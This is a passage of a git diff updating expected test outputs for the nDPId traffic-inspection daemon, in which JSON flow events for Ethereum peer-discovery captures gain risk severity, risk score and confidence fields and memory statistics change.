{"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -20,9 +20,9 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4605341 bytes
-~~ total memory freed........: 4605341 bytes
-~~ total allocations/frees...: 99574/99574
+~~ total memory allocated....: 4689638 bytes
+~~ total memory freed........: 4689638 bytes
+~~ total allocations/frees...: 101164/101164
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
 ~~ json string max len.......: 1424 chars
diff --git a/test/results/ethereum.pcap.out b/test/results/ethereum.pcap.out
index 99e0f885c..8c88c9d62 100644
--- a/test/results/ethereum.pcap.out
+++ b/test/results/ethereum.pcap.out
@@ -1,29 +1,29 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ethereum.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578508362274,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508362274,"pkt":"KDc3AG3IEBMx8Tl2CABFAACc0mBAADURe2hXDt4ZwKgBuN11dl8AiEJtHMys6Q29AOp21rwpZSDXERjTbIzhwNph0idC5kCkV\/FDnhOUP\/GMZC9pQ1ikY4tKfgVohRJdDV\/jhdY3JkNQ8nfjTjeSnG7Ixlzbx1L2txMkADCUTD6WfRXFuzz03\/IfAAHdBMuEfwAAAYJ2X4J2X8mETxbOvYLp94CEXhYgXgU="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578508363333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508363333,"pkt":"KDc3AG3IEBMx8Tl2CABFAADH0wVAADURephXDt4ZwKgBuN11dl8As\/l1jW6o\/uOLsNilE7wPPGgWLrGBgPfvOzwO1DfZyAOcgKFZ114jjOcqSahrn1BNVaBcqPiZ+5Zw3KmlNNeK6areM2YGHfDo3L4DI03KcwYwznBps1b+iFJS+0Kipikc3Gq9AQP4R7hAl090ZgbQhHWBj8BMRwa4LeNB32fKxPZW6UW3BwzH4FX8L40Uh5Yh\/LpdLpgFyY0tX7A7rx7OhPCc704eHlKGuoReFiBf"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1578508363692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1578508363692,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdOfxAACwR9O08vyBHwKgBuHZfdl8AicNGfxf10Wb92tmu8P4AYDHc1S9CYBd0hA8u+7bp2exSZpfjoD4stw3HK2zECpnkODZdOg6LxGWvabU8eolUhCpRWxf283jKbdR45yXwcXrtjWJbPi2JRR9Nts4CTYECrpr\/AQHeBcuErBIAAoJ2X4J2X8uETxbOvYLp94J2X4ReFiBe"}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1578508364272,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"ts_msec":1578508364272,"pkt":"KDc3AG3IEBMx8Tl2CABFCACn7eVAACURF08DcIo5wKgBuGOsdl8Ak1lonaJ3QYcb7U0uMgLRKCkYOOmsVBzd6scD1gTgbTNauX3kB3bPaDZ67w0\/6JScqj4YBzeDQtx9d9GUfbwpNwws+A3fj9N5t1f25M57T8Etpo9cRpw0Ipg9vE7GnadXMLBRAAHoBNeQAAAAAAAAAAAAAAAAAAAAAIInD4InD8mETxbOvYLp94CEXhYgYA=="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHswoAAEAR05vAqAG4A9EtT3Zfdl8As46jAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"}
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHegkAAEARY2nAqAG4NOelbHZfdl8As+VvAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"}
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADH\/g8AAEAROunAqAG4EopsQ3Zfdl8As0D2AUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"}
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1578508364421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508364421,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHWYMAAEARj8vAqAG4ImGsFnZfdl8As\/EZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1578508364422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcLWUAAEAR9WvAqAG4QipS9nZfdl8AiGZvYT14ALKwnMdgMCBzf19RhoDEZwfAnRP1Mz5t1CQfWH9BMW+RtakCpISLcdct0MfsiOdcBIDUccBBbd+y\/K0wDya+KeRA13HRMdUz2NPxyyUESIw4\/BeiGYIdI8USz9rYAAHdBMuEfwAAAYJ2X4J2X8mEQipS9oJ2X4CEXhYgYAU="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1578508364422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHAOAAAEAR3JLAqAG4NOelbHZfdl8As+U915lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"}
